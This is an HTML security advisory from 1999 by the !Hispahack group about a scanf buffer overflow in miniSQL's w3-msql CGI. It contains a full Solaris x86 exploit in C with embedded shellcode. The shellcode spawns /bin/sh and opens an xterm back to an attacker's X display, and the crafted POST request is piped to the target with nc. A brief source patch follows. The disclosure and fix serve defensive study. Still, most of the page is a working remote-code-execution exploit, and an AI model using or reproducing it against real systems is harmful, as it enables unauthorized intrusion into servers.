w3-msql (miniSQL 2.0.4.1 - 2.0.11) Solaris x86 remote exploit. Distribution of miniSQL packet (http://hughes.com.au) comes with a cgi (w3-msql) that can be xploited to run arbitrary code under httpd uid.
e538616d4a13d2a4606a6853e879530a658b5ddefbf3256ac599a2700782b79d
<!DOCTYPE HTML PUBLIC "html.dtd">
<HTML>
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<HTML>
<HEAD>
<META CONTENT="text/html; charset=iso-8859-1" HTTP-EQUIV="Content-Type">
<META NAME="GENERATOR" CONTENT="Mozilla/4.5 [es] (Win95; I) [Netscape]">
<TITLE>mi021</TITLE>
</HEAD>
<BODY BGCOLOR="#000000" VLINK="#66FFFF" TEXT="#33CCFF" LINK="#66FFFF" ALINK="#FFFFFF">
<TABLE WIDTH="90%" COLS="2" CELLSPACING="0" BORDER="0" CELLPADDING="0">
<TR>
<TD WIDTH="10%"></TD>
<TD WIDTH="90%">
<CENTER><B><I><U><FONT SIZE="+1">!Hispahack Research Team</FONT></U></I></B></CENTER>
<P> <B>Program:</B> w3-msql (miniSQL 2.0.4.1 - 2.0.11)
<BR> <B>Platform:</B> *nix
<BR> <B>Risk:</B> Remote access
<BR> <B>Author:</B> <B><I>Zhodiac <zhodiac@softhome.net></I></B>
<BR> <B>Date:</B> 24/12/1999
<BR>
<P> <B><U>- Problem:</U></B>
<P> Distribution of miniSQL packet (<I><A HREF="http://hughes.com.au/">http://hughes.com.au</A></I>)
comes with a cgi (w3-msql) that can be xploited to run arbitrary code under
httpd uid.
<P> It has some overflows, the xploited one was due of
the misuse of the scanf() function.
<P> We notify the programer/s about the porblem one month
ago, without having any reply yet.
<P><B> <U>- Exploit:</U></B>
<P> For proof of vulnerability we release the Solaris
x86 xploit. But be aware, no public xploit for your system does not mean
you can't be hacked. Vulnerability exists, fix it!
<P>------- w3-msql-xploit.c ----------
<P>/*
<BR> * !Hispahack Research Team
<BR> * http://hispahack.ccc.de
<BR> *
<BR> * Xploit for /cgi-bin/w3-msql (msql 2.0.4.1 - 2.0.11)
<BR> *
<BR> * Platform: Solaris x86
<BR> *
Feel free to port it to other arquitectures, if you can...
<BR> *
If so mail me plz.
<BR> *
<BR> * By: Zhodiac <zhodiac@softhome.net>
<BR> *
<BR> * Steps: 1) gcc -o w3-msql-xploit w3-msql-xploit.c
<BR> * 2) xhost +<target_ip>
<BR> * 3) ./w3-msql-xploit
<target> <display> | nc <target> <http_port>
<BR> * 4) Take a cup of
cofee, some kind of drug or wathever
<BR> *
estimulates you at hacking time... while the xterm is comming
<BR> *
or while you are getting raided.
<BR> *
<BR> * #include <standard/disclaimer.h>
<BR> *
<BR> * Madrid, 28/10/99
<BR> *
<BR> * Spain r0x
<BR> *
<BR> */
<P>#include <stdio.h>
<BR>#include <string.h>
<BR>#include <stdlib.h>
<P>/******************/
<BR>/* Customize this */
<BR>/******************/
<BR>//#define LEN_VAR 50
/* mSQL 2.0.4 - 2.0.10.1 */
<BR>#define LEN_VAR 128
/* mSQL 2.0.11 */
<P>// Solaris x86
<BR>#define ADDR 0x8045f8
<P>// Shellcode Solaris x86
<BR>char shellcode[]= /* By Zhodiac <zhodiac@softhome.net> */
<BR> "\x8b\x74\x24\xfc\xb8\x2e\x61\x68\x6d\x05\x01\x01\x01\x01\x39\x06"
<BR> "\x74\x03\x46\xeb\xf9\x33\xc0\x89\x46\xea\x88\x46\xef\x89\x46\xfc"
<BR> "\x88\x46\x07\x46\x46\x88\x46\x08\x4e\x4e\x88\x46\xff\xb0\x1f\xfe"
<BR> "\xc0\x88\x46\x21\x88\x46\x2a\x33\xc0\x89\x76\xf0\x8d\x5e\x08\x89"
<BR> "\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x50\x8d\x5e\xf0\x53\x56\x56\xb0"
<BR> "\x3b\x9a\xaa\xaa\xaa\xaa\x07\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
<BR> "\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
<BR> "/bin/shA-cA/usr/openwin/bin/xtermA-displayA";
<P>#define ADDR_TIMES 12
<BR>#define BUFSIZE LEN_VAR+15*1024+LEN_VAR+ADDR_TIMES*4-16
<BR>#define NOP 0x90
<P>int main (int argc, char *argv[]) {
<P>char *buf, *ptr;
<BR>long addr=ADDR;
<BR>int aux;
<P> if (argc<3){
<BR> printf("Usage: %s target display | nc target 80 \n",argv[0]);
<BR> exit(-1);
<BR> }
<P> if ((buf=malloc(BUFSIZE))==NULL) {
<BR> perror("malloc()");
<BR> exit(-1);
<BR> }
<P> shellcode[44]=(char)strlen(argv[2])+43;
<P> ptr=(char *)buf;
<BR> memset(ptr,NOP,BUFSIZE-strlen(argv[2])-strlen(shellcode)-ADDR_TIMES*4);
<BR> ptr+=BUFSIZE-strlen(shellcode)-strlen(argv[2])-ADDR_TIMES*4;
<BR> memcpy(ptr,shellcode,strlen(shellcode));
<BR> ptr+=strlen(shellcode);
<BR> memcpy(ptr,argv[2],strlen(argv[2]));
<BR> ptr+=strlen(argv[2]);
<P> for (aux=0;aux<ADDR_TIMES;aux++) {
<BR> ptr[0] = (addr & 0x000000ff);
<BR> ptr[1] = (addr & 0x0000ff00) >> 8;
<BR> ptr[2] = (addr & 0x00ff0000) >> 16;
<BR> ptr[3] = (addr & 0xff000000) >> 24;
<BR> ptr+=4;
<BR> }
<P> printf("POST /cgi-bin/w3-msql/index.html HTTP/1.0\n");
<BR> printf("Connection: Keep-Alive\n");
<BR> printf("User-Agent: Mozilla/4.60 [en] (X11; I; Linux 2.0.38 i686\n");
<BR> printf("Host: %s\n",argv[1]);
<BR> printf("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg\n");
<BR> printf("Accept-Encoding: gzip\n");
<BR> printf("Accept-Language: en\n");
<BR> printf("Accept-Charset: iso-8859-1,*,utf-8\n");
<BR> printf("Content-type: multipart/form-data\n");
<BR> printf("Content-length: %i\n\n",BUFSIZE);
<P> printf("%s \n\n\n",buf);
<P> free(buf);
<P>}
<P>------- w3-msql-xploit.c ---------
<BR>
<P> <B><U>- Fix:</U></B>
<BR>
<P> Best solution is to wait for a new patched version, meanwhile
here you have a patch that will stop this attack and some other (be aware
that this patch was done after a total revision of the code, maybe there
are some other overflows).
<P>------ w3-msql.patch ---------
<P>410c410
<BR>< scanf("%s ", boundary);
<BR>---
<BR>> scanf("%128s ", boundary);
<BR>418c418
<BR>< strcat(var, buffer);
<BR>---
<BR>> strncat(var, buffer,sizeof(buffer));
<BR>428c428
<BR>< scanf("
Content-Type: %s ", buffer);
<BR>---
<BR>> scanf("
Content-Type: %15360s ", buffer);
<P>------ w3-msql.patch ---------
<P> piscis:~# patch w3-msql.c w3-msql.patch
<BR> piscis:~#
<P> Spain r0x
<P> Greetz :)
<P> <B><I>Zhodiac</I></B>
<BR>
<BR>
<BR>
<TABLE WIDTH="100%" COLS="1" CELLSPACING="0" BORDER="0" CELLPADDING="0">
<TR>
<TD></TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
<CENTER>
<P><FONT SIZE="-1"> (C) 1997-2001 by !Hispahack</FONT>
<BR><FONT SIZE="-1">Para ver el web en las mejores condiciones, usa una resolución
de 800x600 y Netscape Navigator</FONT></CENTER>
</BODY>
</HTML>